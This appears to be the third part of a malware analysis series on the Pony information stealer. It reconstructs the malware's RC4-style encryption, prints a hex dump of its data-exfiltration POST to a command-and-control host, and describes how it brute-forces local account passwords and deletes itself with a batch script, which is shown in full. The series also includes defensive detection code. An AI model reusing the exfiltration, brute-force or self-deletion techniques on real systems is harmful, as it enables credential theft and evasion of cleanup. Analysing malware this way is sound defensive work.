A Case Study of Information Stealers 2023
Introduction
In this third and final installment of the Pony Stealer series, we’ll pick up where we left off last time: the encryption algorithm. After that, we’ll look at how Pony sends encrypted information to the server, and then finish the cleanup work that the malware does.
Encrypt stolen data:
Using the buffer created in the decompiled function we saw in the second part, the stream is encrypted by calling the following function:
/* pseudo code */
ENCRYPT(UCHAR* keybuf, UCHAR* data, int datalen)
{
    UCHAR ibuf = 0;    /* first index into the 256-byte keybuf, wraps at 256 */
    UCHAR ebp_4 = 0;   /* second index, also a single byte */
    UCHAR ebp_1, ebp_2;
    for (int i = 0; i < datalen; i++)
    {
        ibuf++;
        ebp_1 = keybuf[ibuf];
        ebp_4 += ebp_1;
        ebp_2 = keybuf[ebp_4];
        keybuf[ibuf]  = ebp_2;   /* swap keybuf[ibuf] and keybuf[ebp_4] */
        keybuf[ebp_4] = ebp_1;
        data[i] ^= keybuf[(UCHAR)(ebp_1 + ebp_2)];   /* XOR with the keystream byte */
    }
}
After receiving the data, the server can easily decrypt it by calling the same two functions: XORing a byte with the same keystream byte twice restores the original, so one routine serves for both directions. After the stream has been encrypted, its header is set to CRYPTED0, and the stream data is then re-encrypted using the same method we just saw.
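The following Python model is an added example, not code from the article or from the Pony sample. It keeps the variable names of the loop above; the index-update-swap-XOR pattern is byte for byte RC4's keystream generator, so the 256-byte keybuf is assumed here to come from the standard RC4 key schedule (the article shows only the loop), and the exact way the CRYPTED0 header and the second pass are layered is likewise an assumption.

```python
from typing import List

def key_schedule(key: bytes) -> List[int]:
    """Standard RC4 key schedule (ASSUMED: the article shows only the
    encryption loop, not the function that fills the 256-byte keybuf)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s

def pony_crypt(key: bytes, data: bytes) -> bytes:
    """The article's loop with its names kept: ibuf++, ebp_4 += keybuf[ibuf],
    swap the two slots, XOR the data byte with keybuf[ebp_1 + ebp_2].
    Running it twice with the same key restores the input."""
    keybuf = key_schedule(key)
    out = bytearray(data)
    ibuf = ebp_4 = 0
    for i in range(len(out)):
        ibuf = (ibuf + 1) & 0xFF            # both indices are single bytes
        ebp_1 = keybuf[ibuf]
        ebp_4 = (ebp_4 + ebp_1) & 0xFF
        ebp_2 = keybuf[ebp_4]
        keybuf[ibuf], keybuf[ebp_4] = ebp_2, ebp_1
        out[i] ^= keybuf[(ebp_1 + ebp_2) & 0xFF]
    return bytes(out)

HEADER = b"CRYPTED0"

def pony_encrypt_stream(key: bytes, stream: bytes) -> bytes:
    """Encrypt, tag with the CRYPTED0 header, encrypt again (layout ASSUMED)."""
    return pony_crypt(key, HEADER + pony_crypt(key, stream))

def pony_decrypt_stream(key: bytes, blob: bytes) -> bytes:
    """Server side: peel both layers with the same function; the header check
    separates a valid stream from a wrong key or a non-Pony blob."""
    inner = pony_crypt(key, blob)
    if not inner.startswith(HEADER):
        raise ValueError("no CRYPTED0 header: wrong key or not a Pony stream")
    return pony_crypt(key, inner[len(HEADER):])
```

The standard RC4 test vector (key "Key", plaintext "Plaintext" gives bbf316e8d940af0ad3) comes straight out of pony_crypt, which confirms that the loop is plain RC4.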
Submitting stolen information:
At this stage, the stolen information is ready to be sent to the server. The information is sent to domain_name/panel/gateway.php in a POST request, and then the online service apparently decrypts the data and displays it to the attacker.
Here is the hex dump of the request that is sent to the server (non-printable bytes are shown as dots in the ASCII column):
0029EED8 50 4F 53 54|20 2F 53 75|72 65 2F 70|61 6E 65 6C| POST /Sure/panel
0029EEE8 2F 2F 67 61|74 65 2E 70|68 70 20 48|54 54 50 2F| //gate.php HTTP/
0029EEF8 31 2E 30 0D|0A 48 6F 73|74 3A 20 68|65 72 69 74| 1.0..Host: herit
0029EF08 61 67 65 69|62 6E 2E 63|6F 6D 0D 0A|41 63 63 65| ageibn.com..Acce
0029EF18 70 74 3A 20|2A 2F 2A 0D|0A 41 63 63|65 70 74 2D| pt: */*..Accept-
0029EF28 45 6E 63 6F|64 69 6E 67|3A 20 69 64|65 6E 74 69| Encoding: identi
0029EF38 74 79 2C 20|2A 3B 71 3D|30 0D 0A 41|63 63 65 70| ty, *;q=0..Accep
0029EF48 74 2D 4C 61|6E 67 75 61|67 65 3A 20|65 6E 2D 55| t-Language: en-U
0029EF58 53 0D 0A 43|6F 6E 74 65|6E 74 2D 4C|65 6E 67 74| S..Content-Lengt
0029EF68 68 3A 20 31|38 30 0D 0A|43 6F 6E 74|65 6E 74 2D| h: 180..Content-
0029EF78 54 79 70 65|3A 20 61 70|70 6C 69 63|61 74 69 6F| Type: applicatio
0029EF88 6E 2F 6F 63|74 65 74 2D|73 74 72 65|61 6D 0D 0A| n/octet-stream..
0029EF98 43 6F 6E 6E|65 63 74 69|6F 6E 3A 20|63 6C 6F 73| Connection: clos
0029EFA8 65 0D 0A 43|6F 6E 74 65|6E 74 2D 45|6E 63 6F 64| e..Content-Encod
0029EFB8 69 6E 67 3A|20 62 69 6E|61 72 79 0D|0A 55 73 65| ing: binary..Use
0029EFC8 72 2D 41 67|65 6E 74 3A|20 4D 6F 7A|69 6C 6C 61| r-Agent: Mozilla
0029EFD8 2F 34 2E 30|20 28 63 6F|6D 70 61 74|69 62 6C 65| /4.0 (compatible
0029EFE8 3B 20 4D 53|49 45 20 37|2E 30 3B 20|57 69 6E 64| ; MSIE 7.0; Wind
0029EFF8 6F 77 73 20|4E 54 20 36|2E 31 3B 20|54 72 69 64| ows NT 6.1; Trid
0029F008 65 6E 74 2F|34 2E 30 3B|20 53 4C 43|43 32 3B 20| ent/4.0; SLCC2;
0029F018 2E 4E 45 54|20 43 4C 52|20 32 2E 30|2E 35 30 37| .NET CLR 2.0.507
0029F028 32 37 3B 20|2E 4E 45 54|20 43 4C 52|20 33 2E 35| 27; .NET CLR 3.5
0029F038 2E 33 30 37|32 39 3B 20|2E 4E 45 54|20 43 4C 52| .30729; .NET CLR
0029F048 20 33 2E 30|2E 33 30 37|32 39 3B 20|4D 65 64 69|  3.0.30729; Medi
0029F058 61 20 43 65|6E 74 65 72|20 50 43 20|36 2E 30 29| a Center PC 6.0)
0029F068 0D 0A 0D 0A|00                                   .....
After successfully sending the header, Pony sends the encrypted stolen data to the server. Finally, the stream holding the encrypted data is freed.
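As an added example (not the article's code), the request from the dump above is reconstructed as bytes and parsed with a small Python helper; the trait checks are the headers a network defender could key on when writing a rule for this beacon. The dump shows only the headers (Content-Length claims a 180-byte body), so nothing about the body is checked.

```python
from typing import Dict, Tuple

# The request from the hex dump, reconstructed byte for byte.
REQUEST = (
    b"POST /Sure/panel//gate.php HTTP/1.0\r\n"
    b"Host: heritageibn.com\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity, *;q=0\r\n"
    b"Accept-Language: en-US\r\n"
    b"Content-Length: 180\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Connection: close\r\n"
    b"Content-Encoding: binary\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0;"
    b" SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;"
    b" Media Center PC 6.0)\r\n"
    b"\r\n"
)

def parse_request(raw: bytes) -> Tuple[str, str, str, Dict[str, str]]:
    """Split an HTTP request into (method, path, version, headers); header
    names are lower-cased so lookups do not depend on the client's casing."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers

def pony_gate_traits(raw: bytes) -> Dict[str, bool]:
    """Each trait alone is weak evidence; the combination is what the dump shows."""
    method, path, version, h = parse_request(raw)
    return {
        "post_to_gate_php": method == "POST" and path.rstrip("/").endswith("gate.php"),
        "http_1_0": version == "HTTP/1.0",
        "octet_stream_body": h.get("content-type") == "application/octet-stream",
        "binary_content_encoding": h.get("content-encoding") == "binary",
        "msie7_user_agent": "MSIE 7.0" in h.get("user-agent", ""),
    }
```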
Stealing local computer credentials:
It is not clear why the malware authors decided to perform this task on their own. They could have included the function responsible for stealing local computer account credentials in the callback table, thus communicating with the server only once. Instead, they decided to do it afterwards and re-compress, encrypt and then send each account’s credentials separately.
Pony starts by adjusting its process token, enabling the following privileges:
- SeImpersonatePrivilege
- SeTcbPrivilege
- SeChangeNotifyPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeIncreaseQuotaPrivilege
- SeAssignPrimaryTokenPrivilege
Each privilege is enabled on the token in the same way:
- LookupPrivilegeValueA is called to look up the privilege's LUID.
- OpenProcessToken is called with TOKEN_ADJUST_PRIVILEGES for the current process.
- AdjustTokenPrivileges is called to add the privilege to the process token.
The token must be modified in this way so that the current thread can impersonate another user's account.
The next step is to enumerate all user accounts (usernames) on the machine by calling the NetUserEnum API (in my case the users were "Administrator" and "Guest"). Pony then brute-forces each account's password using a word list. The process is as follows:
- In my case, the sample begins with the Guest account.
- First, it tries to log on with an empty password using the LogonUserA API.
- If that fails, it supplies the username in lowercase as the password to the same API.
- If that also fails, Pony uses the word list (stored at 00417F27) that was decrypted in memory before it even started stealing information (see the first part of this series). The sample loops through each word and supplies it as the password to LogonUserA.
- If a call to LogonUserA succeeds, the password is correct. The stealer encrypts the username and password in the same way as before and sends them to the server.
Whether or not any call to LogonUserA succeeded, the sample then moves on to the next account and repeats the same steps.
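Added example (not from the article) of how a defender would spot this loop in the Windows Security log: each failed LogonUserA call is audited as event 4625 and each success as 4624, and both record the calling process. The log lines are constructed in a simplified key=value form rather than real Windows output, and the process paths and account names are hypothetical.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# CONSTRUCTED sample: a few failures across two accounts from one caller
# within seconds, then a success; a normal interactive logon for contrast.
SAMPLE_LOG = """\
2023-05-01T10:00:01 EventID=4625 TargetUserName=Guest CallerProcessName=C:\\Users\\me\\Desktop\\pony.exe
2023-05-01T10:00:01 EventID=4625 TargetUserName=Guest CallerProcessName=C:\\Users\\me\\Desktop\\pony.exe
2023-05-01T10:00:02 EventID=4625 TargetUserName=Guest CallerProcessName=C:\\Users\\me\\Desktop\\pony.exe
2023-05-01T10:00:02 EventID=4625 TargetUserName=Administrator CallerProcessName=C:\\Users\\me\\Desktop\\pony.exe
2023-05-01T10:00:03 EventID=4625 TargetUserName=Administrator CallerProcessName=C:\\Users\\me\\Desktop\\pony.exe
2023-05-01T10:00:03 EventID=4624 TargetUserName=Administrator CallerProcessName=C:\\Users\\me\\Desktop\\pony.exe
2023-05-01T10:05:00 EventID=4625 TargetUserName=me CallerProcessName=C:\\Windows\\System32\\winlogon.exe
2023-05-01T10:05:04 EventID=4624 TargetUserName=me CallerProcessName=C:\\Windows\\System32\\winlogon.exe
"""

def parse(line: str) -> Dict[str, str]:
    """Timestamp first, then key=value fields (no spaces inside values)."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = ts
    return rec

def find_local_bruteforce(log: str, window: timedelta = timedelta(seconds=60),
                          min_failures: int = 3) -> List[Dict[str, object]]:
    """Flag a caller process that piles up logon failures across accounts
    inside a short window, and report which accounts it then logged on as."""
    by_proc: Dict[str, List[Dict[str, str]]] = defaultdict(list)
    for line in log.splitlines():
        rec = parse(line)
        by_proc[rec["CallerProcessName"]].append(rec)
    hits = []
    for proc, events in by_proc.items():
        fails = [e for e in events if e["EventID"] == "4625"]
        if len(fails) < min_failures:
            continue
        span = (datetime.fromisoformat(fails[-1]["ts"])
                - datetime.fromisoformat(fails[0]["ts"]))
        if span > window:
            continue
        hits.append({
            "process": proc,
            "failures": len(fails),
            "accounts_tried": sorted({e["TargetUserName"] for e in fails}),
            "accounts_opened": sorted({e["TargetUserName"] for e in events
                                       if e["EventID"] == "4624"}),
        })
    return hits
```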
Self-destruction:
The last function called (at 004108C9) removes the malware from disk. Self-deletion works as follows:
- A .bat file with a random name is generated, e.g. 72022703.bat.
- The full path to the sample executable is obtained with the GetModuleFileName API.
- The path to the Temp folder is obtained with the GetTempPathA API, e.g. C:\Users\me\AppData\Local\Temp.
- The following batch script is written to the file:
:ktk
del %1
if exist %1 goto ktk
del %0
- shell32.dll is loaded and GetProcAddress is used to get the address of ShellExecuteA, which is then called as follows:
ShellExecuteA(NULL, "open", "C:\Users\SONY\AppData\Local\Temp\72022703.bat", "C:\Users\me\Desktop\pony.exe", NULL, NULL);
As you can see, the path to the malware executable is passed to the batch script as an argument, and the script simply deletes it. The computer is now clean again, except that the user’s information was stolen.
Conclusion:
In this series, we took an in-depth look at Pony Information Stealer and demystified how it steals personal information, encrypts it, and then sends it to a remote server. However, there is no reason to generalize that this is how every information stealer works. As the name of this series suggests, this analysis is a case study: just one example of the information stealers we can find "out there".